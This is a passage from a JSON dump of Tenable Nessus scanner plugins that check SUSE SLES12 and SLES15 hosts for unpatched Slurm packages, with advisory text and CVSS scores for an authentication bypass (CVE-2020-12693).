value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libpmi0-18.08.9-3.13.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libpmi0-debuginfo-18.08.9-3.13.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libslurm33-18.08.9-3.13.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libslurm33-debuginfo-18.08.9-3.13.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"perl-slurm-18.08.9-3.13.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"perl-slurm-debuginfo-18.08.9-3.13.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"slurm-18.08.9-3.13.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"slurm-auth-none-18.08.9-3.13.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"slurm-auth-none-debuginfo-18.08.9-3.13.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"slurm-config-18.08.9-3.13.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"slurm-config-man-18.08.9-3.13.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"slurm-debuginfo-18.08.9-3.13.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"slurm-debugsource-18.08.9-3.13.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"slurm-devel-18.08.9-3.13.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"slurm-doc-18.08.9-3.13.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"slurm-lua-18.08.9-3.13.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"slurm-lua-debuginfo-18.08.9-3.13.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"slurm-munge-18.08.9-3.13.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"slurm-munge-debuginfo-18.08.9-3.13.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"slurm-node-18.08.9-3.13.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"slurm-node-debuginfo-18.08.9-3.13.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"slurm-pam_slurm-18.08.9-3.13.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"slurm-pam_slurm-debuginfo-18.08.9-3.13.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"slurm-plugins-18.08.9-3.13.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"slurm-plugins-debuginfo-18.08.9-3.13.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"slurm-slurmdbd-18.08.9-3.13.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"slurm-slurmdbd-debuginfo-18.08.9-3.13.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"slurm-sql-18.08.9-3.13.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"slurm-sql-debuginfo-18.08.9-3.13.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"slurm-sview-18.08.9-3.13.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"slurm-sview-debuginfo-18.08.9-3.13.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"slurm-torque-18.08.9-3.13.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"slurm-torque-debuginfo-18.08.9-3.13.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"slurm\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:19:42", "description": "This update for slurm fixes the following issues :\n\nFix Authentication Bypass when Message Aggregation is enabled CVE-2020-12693 This fixes and issue where authentication could be bypassed via an alternate path or channel when message Aggregation was enabled. A race condition allowed a user to launch a process as an arbitrary user. Add :\n\nFix-Authentication-Bypass-when-Message-Aggregation-is-enabled-CVE-2020\n-1269 3.patch (CVE-2020-12693, bsc#1172004).\n\nRemove unneeded build dependency to postgresql-devel.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-11T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : slurm (SUSE-SU-2020:2601-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19727", "CVE-2020-1269", "CVE-2020-12693"], "modified": "2022-05-12T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libpmi0", "p-cpe:/a:novell:suse_linux:libpmi0-debuginfo", "p-cpe:/a:novell:suse_linux:libslurm31", "p-cpe:/a:novell:suse_linux:libslurm31-debuginfo", "p-cpe:/a:novell:suse_linux:perl-slurm", "p-cpe:/a:novell:suse_linux:perl-slurm-debuginfo", "p-cpe:/a:novell:suse_linux:slurm", "p-cpe:/a:novell:suse_linux:slurm-auth-none", "p-cpe:/a:novell:suse_linux:slurm-auth-none-debuginfo", "p-cpe:/a:novell:suse_linux:slurm-config", "p-cpe:/a:novell:suse_linux:slurm-debuginfo", "p-cpe:/a:novell:suse_linux:slurm-debugsource", "p-cpe:/a:novell:suse_linux:slurm-devel", "p-cpe:/a:novell:suse_linux:slurm-doc", "p-cpe:/a:novell:suse_linux:slurm-lua", "p-cpe:/a:novell:suse_linux:slurm-lua-debuginfo", "p-cpe:/a:novell:suse_linux:slurm-munge", "p-cpe:/a:novell:suse_linux:slurm-munge-debuginfo", "p-cpe:/a:novell:suse_linux:slurm-pam_slurm", "p-cpe:/a:novell:suse_linux:slurm-pam_slurm-debuginfo", "p-cpe:/a:novell:suse_linux:slurm-plugins", "p-cpe:/a:novell:suse_linux:slurm-plugins-debuginfo", "p-cpe:/a:novell:suse_linux:slurm-sched-wiki", "p-cpe:/a:novell:suse_linux:slurm-slurmdb-direct", "p-cpe:/a:novell:suse_linux:slurm-slurmdbd", "p-cpe:/a:novell:suse_linux:slurm-slurmdbd-debuginfo", "p-cpe:/a:novell:suse_linux:slurm-sql", "p-cpe:/a:novell:suse_linux:slurm-sql-debuginfo", "p-cpe:/a:novell:suse_linux:slurm-torque", "p-cpe:/a:novell:suse_linux:slurm-torque-debuginfo", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2020-2601-1.NASL", "href": "https://www.tenable.com/plugins/nessus/140514", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:2601-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140514);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/12\");\n\n script_cve_id(\"CVE-2019-19727\", \"CVE-2020-1269\", \"CVE-2020-12693\");\n\n script_name(english:\"SUSE SLES12 Security Update : slurm (SUSE-SU-2020:2601-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for slurm fixes the following issues :\n\nFix Authentication Bypass when Message Aggregation is enabled\nCVE-2020-12693 This fixes and issue where authentication could be\nbypassed via an alternate path or channel when message Aggregation was\nenabled. A race condition allowed a user to launch a process as an\narbitrary user. Add :\n\nFix-Authentication-Bypass-when-Message-Aggregation-is-enabled-CVE-2020\n-1269 3.patch (CVE-2020-12693, bsc#1172004).\n\nRemove unneeded build dependency to postgresql-devel.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1172004\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19727/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-12693/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20202601-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f0323721\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for HPC 12 :\n\nzypper in -t patch SUSE-SLE-Module-HPC-12-2020-2601=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1269\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-12693\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpmi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpmi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libslurm31\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libslurm31-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:perl-slurm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:perl-slurm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-auth-none\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-auth-none-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-config\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-lua\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-lua-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-munge\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-munge-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-pam_slurm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-pam_slurm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-plugins-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-sched-wiki\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-slurmdb-direct\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-slurmdbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-slurmdbd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-sql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-sql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-torque\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-torque-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"libpmi0-17.02.11-6.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"libpmi0-debuginfo-17.02.11-6.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"libslurm31-17.02.11-6.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"libslurm31-debuginfo-17.02.11-6.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"perl-slurm-17.02.11-6.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"perl-slurm-debuginfo-17.02.11-6.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm-17.02.11-6.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm-auth-none-17.02.11-6.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm-auth-none-debuginfo-17.02.11-6.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm-config-17.02.11-6.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm-debuginfo-17.02.11-6.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm-debugsource-17.02.11-6.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm-devel-17.02.11-6.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm-doc-17.02.11-6.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm-lua-17.02.11-6.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm-lua-debuginfo-17.02.11-6.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm-munge-17.02.11-6.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm-munge-debuginfo-17.02.11-6.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm-pam_slurm-17.02.11-6.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm-pam_slurm-debuginfo-17.02.11-6.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm-plugins-17.02.11-6.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm-plugins-debuginfo-17.02.11-6.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm-sched-wiki-17.02.11-6.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm-slurmdb-direct-17.02.11-6.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm-slurmdbd-17.02.11-6.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm-slurmdbd-debuginfo-17.02.11-6.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm-sql-17.02.11-6.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm-sql-debuginfo-17.02.11-6.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm-torque-17.02.11-6.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm-torque-debuginfo-17.02.11-6.44.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"slurm\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:20:27", "description": "This update for slurm fixes the following issues :\n\nFix Authentication Bypass when Message Aggregation is enabled CVE-2020-12693 This fixes and issue where authentication could be bypassed via an alternate path or channel when message Aggregation was enabled. A race condition allowed a user to launch a process as an arbitrary user. Add :\n\nFix-Authentication-Bypass-when-Message-Aggregation-is-enabled-CVE-2020\n-1269 3.patch (CVE-2020-12693, bsc#1172004).\n\nRemove unneeded build dependency to postgresql-devel.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-11T00:00:00", "type": "nessus", "title": "SUSE SLES15 Security Update : slurm (SUSE-SU-2020:2602-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19727", "CVE-2020-1269", "CVE-2020-12693"], "modified": "2022-05-12T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libslurm32", "p-cpe:/a:novell:suse_linux:libslurm32-debuginfo", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2020-2602-1.NASL", "href": "https://www.tenable.com/plugins/nessus/140515", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:2602-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140515);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/12\");\n\n script_cve_id(\"CVE-2019-19727\", \"CVE-2020-1269\", \"CVE-2020-12693\");\n\n script_name(english:\"SUSE SLES15 Security Update : slurm (SUSE-SU-2020:2602-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for slurm fixes the following issues :\n\nFix Authentication Bypass when Message Aggregation is enabled\nCVE-2020-12693 This fixes and issue where authentication could be\nbypassed via an alternate path or channel when message Aggregation was\nenabled. A race condition allowed a user to launch a process as an\narbitrary user. Add :\n\nFix-Authentication-Bypass-when-Message-Aggregation-is-enabled-CVE-2020\n-1269 3.patch (CVE-2020-12693, bsc#1172004).\n\nRemove unneeded build dependency to postgresql-devel.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1172004\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19727/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-12693/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20202602-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b1d76250\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for HPC 15-SP1 :\n\nzypper in -t patch SUSE-SLE-Module-HPC-15-SP1-2020-2602=1\n\nSUSE Linux Enterprise High Performance Computing 15-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-2020-2602=1\n\nSUSE Linux Enterprise High Performance Computing 15-ESPOS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-2020-2602=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1269\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-12693\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libslurm32\");\n script_set_attribute(attribute:\"cpe\", 